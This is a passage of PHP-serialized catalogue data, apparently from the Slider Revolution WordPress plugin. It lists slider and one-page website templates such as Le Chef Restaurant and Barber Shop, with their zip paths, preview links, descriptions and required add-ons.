Content\";s:5:\"alias\";s:16:\"parallax_content\";s:3:\"zip\";s:26:\"packs/parallax_content.zip\";s:3:\"uid\";s:32:\"a25c5fb8f74757476ab4dc038e56f90d\";s:3:\"img\";s:27:\"parallax_content/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:239;a:25:{s:2:\"id\";s:3:\"248\";s:5:\"title\";s:15:\"Parallax Footer\";s:5:\"alias\";s:15:\"parallax_footer\";s:3:\"zip\";s:25:\"packs/parallax_footer.zip\";s:3:\"uid\";s:32:\"665dff9ea6eaf162a2a1f160f51a9ddb\";s:3:\"img\";s:26:\"parallax_footer/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/parallax-one-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:230:\"<span class=\"ttm_content\">The Parallax One-Page WordPress Template is consisting of 3 hero blocks and contains a beautiful parallax mountain scene. An impactful opening to your web presence!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Parallax One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"14\";s:9:\"installed\";b:0;}i:240;a:25:{s:2:\"id\";s:3:\"249\";s:5:\"title\";s:18:\"Le Chef Restaurant\";s:5:\"alias\";s:18:\"le-chef-restaurant\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"le-chef-restaurant-package\";s:3:\"img\";s:39:\"packages/le-chef-restaurant-package.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:241;a:25:{s:2:\"id\";s:3:\"250\";s:5:\"title\";s:12:\"Le Chef Menu\";s:5:\"alias\";s:12:\"le-chef-menu\";s:3:\"zip\";s:22:\"packs/le-chef-menu.zip\";s:3:\"uid\";s:32:\"2f2a6a333431fefe4a7b3b6a982b2ff5\";s:3:\"img\";s:23:\"le-chef-menu/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:242;a:25:{s:2:\"id\";s:3:\"251\";s:5:\"title\";s:14:\"Le Chef Header\";s:5:\"alias\";s:14:\"le-chef-header\";s:3:\"zip\";s:24:\"packs/le-chef-header.zip\";s:3:\"uid\";s:32:\"06450ca3be5a4a8959f3752ab974e574\";s:3:\"img\";s:25:\"le-chef-header/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:243;a:25:{s:2:\"id\";s:3:\"252\";s:5:\"title\";s:18:\"Le Chef Philosophy\";s:5:\"alias\";s:18:\"le-chef-philosophy\";s:3:\"zip\";s:28:\"packs/le-chef-philosophy.zip\";s:3:\"uid\";s:32:\"a532fd029addeb18106e751409b8e20a\";s:3:\"img\";s:29:\"le-chef-philosophy/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:244;a:25:{s:2:\"id\";s:3:\"253\";s:5:\"title\";s:12:\"Le Chef Food\";s:5:\"alias\";s:12:\"le-chef-food\";s:3:\"zip\";s:22:\"packs/le-chef-food.zip\";s:3:\"uid\";s:32:\"cd4b6a2cb5de2dd20a0e8ba0c35451df\";s:3:\"img\";s:23:\"le-chef-food/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:245;a:25:{s:2:\"id\";s:3:\"254\";s:5:\"title\";s:16:\"Le Chef La Carte\";s:5:\"alias\";s:16:\"le-chef-la-carte\";s:3:\"zip\";s:26:\"packs/le-chef-la-carte.zip\";s:3:\"uid\";s:32:\"6f312749679c3ba52c41189a6b8bf729\";s:3:\"img\";s:27:\"le-chef-la-carte/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:246;a:25:{s:2:\"id\";s:3:\"255\";s:5:\"title\";s:14:\"Le Chef Footer\";s:5:\"alias\";s:14:\"le-chef-footer\";s:3:\"zip\";s:24:\"packs/le-chef-footer.zip\";s:3:\"uid\";s:32:\"12fc241e8e5b9e5df9758c43448e2907\";s:3:\"img\";s:25:\"le-chef-footer/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/le-chef-restaurant-website-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:261:\"<span class=\"ttm_content\">The Le Chef Restaurant Template is a One-Page Website and a full solution for your clients Restaurant. Showcase images in the header slideshow and present the Restaurants offering in a clear way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Le Chef Restaurant\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"15\";s:9:\"installed\";b:0;}i:247;a:22:{s:2:\"id\";s:3:\"256\";s:5:\"title\";s:20:\"News Magazine Slider\";s:5:\"alias\";s:20:\"news-magazine-slider\";s:3:\"zip\";s:24:\"news-magazine-slider.zip\";s:3:\"uid\";s:32:\"31f2c1506babb1fef459401f051d2d52\";s:3:\"img\";s:31:\"news-magazine-slider/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/news-magazine-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:205:\"<span class=\"ttm_content\">The Magazine Slider offers various layouts that support static content images, HTML5 and Youtube video. Great for any blog or news website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:248;a:22:{s:2:\"id\";s:3:\"257\";s:5:\"title\";s:18:\"Real Estate Slider\";s:5:\"alias\";s:18:\"real-estate-slider\";s:3:\"zip\";s:22:\"real-estate-slider.zip\";s:3:\"uid\";s:32:\"739ce6336e46815094387c9448e6c804\";s:3:\"img\";s:29:\"real-estate-slider/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/real-estate-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:204:\"<span class=\"ttm_content\">The Real Estate Slider allows to display real estate offers with a large ken burns background image and additional thumbnail hover images.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:249;a:22:{s:2:\"id\";s:3:\"258\";s:5:\"title\";s:14:\"Fashion Header\";s:5:\"alias\";s:14:\"fashion-header\";s:3:\"zip\";s:18:\"fashion-header.zip\";s:3:\"uid\";s:32:\"24ece4e7f4d31cd90377c62abbd9e25a\";s:3:\"img\";s:25:\"fashion-header/slide1.jpg\";s:7:\"preview\";s:75:\"https://revolution.themepunch.com/fashion-shop-header-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:254:\"<span class=\"ttm_content\">The Fashion Shop Header ist the ideal Slider to display as an intro to your shop website or as a separator in between content. Our unique \"Bubble Morph\" effect makes this module stand out!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:250;a:22:{s:2:\"id\";s:3:\"259\";s:5:\"title\";s:14:\"Seasonal Offer\";s:5:\"alias\";s:13:\"seasonaloffer\";s:3:\"zip\";s:17:\"seasonaloffer.zip\";s:3:\"uid\";s:32:\"caf2f17f8fd64f2f89dcb3c8dd238457\";s:3:\"img\";s:24:\"seasonaloffer/slide1.jpg\";s:7:\"preview\";s:80:\"https://revolution.themepunch.com/seasonal-offer-christmas-header-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.8.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:204:\"<span class=\"ttm_content\">Use the Seasonal Offer Header to promote special offers in the holiday season, or just to add some snowy christmas spirit to your website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:153:\"[{\"path\":\"revslider-snow-addon\\/revslider-snow-addon.php\",\"name\":\"Snow AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:251;a:25:{s:2:\"id\";s:3:\"260\";s:5:\"title\";s:11:\"Barber Shop\";s:5:\"alias\";s:11:\"barber-shop\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:19:\"barber-shop-package\";s:3:\"img\";s:32:\"packages/barber-shop-package.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:252;a:25:{s:2:\"id\";s:3:\"261\";s:5:\"title\";s:18:\"Barber Shop Header\";s:5:\"alias\";s:18:\"barber-shop-header\";s:3:\"zip\";s:28:\"packs/barber-shop-header.zip\";s:3:\"uid\";s:32:\"71c995d36d39a0e8a04cffdf753f2ba2\";s:3:\"img\";s:29:\"barber-shop-header/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:253;a:25:{s:2:\"id\";s:3:\"262\";s:5:\"title\";s:23:\"Barber Shop Mobile Menu\";s:5:\"alias\";s:23:\"barber-shop-mobile-menu\";s:3:\"zip\";s:33:\"packs/barber-shop-mobile-menu.zip\";s:3:\"uid\";s:32:\"762c6fb5c6306f37becb1e55773c2592\";s:3:\"img\";s:34:\"barber-shop-mobile-menu/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:254;a:25:{s:2:\"id\";s:3:\"263\";s:5:\"title\";s:24:\"Barber Shop First Screen\";s:5:\"alias\";s:24:\"barber-shop-first-screen\";s:3:\"zip\";s:34:\"packs/barber-shop-first-screen.zip\";s:3:\"uid\";s:32:\"acf70bfd64cff2c3c2ea5585223575da\";s:3:\"img\";s:35:\"barber-shop-first-screen/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:255;a:25:{s:2:\"id\";s:3:\"264\";s:5:\"title\";s:17:\"Barber Shop About\";s:5:\"alias\";s:17:\"barber-shop-about\";s:3:\"zip\";s:27:\"packs/barber-shop-about.zip\";s:3:\"uid\";s:32:\"bc8b63cfc7f8c34173b4fd5b082fc05a\";s:3:\"img\";s:28:\"barber-shop-about/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you 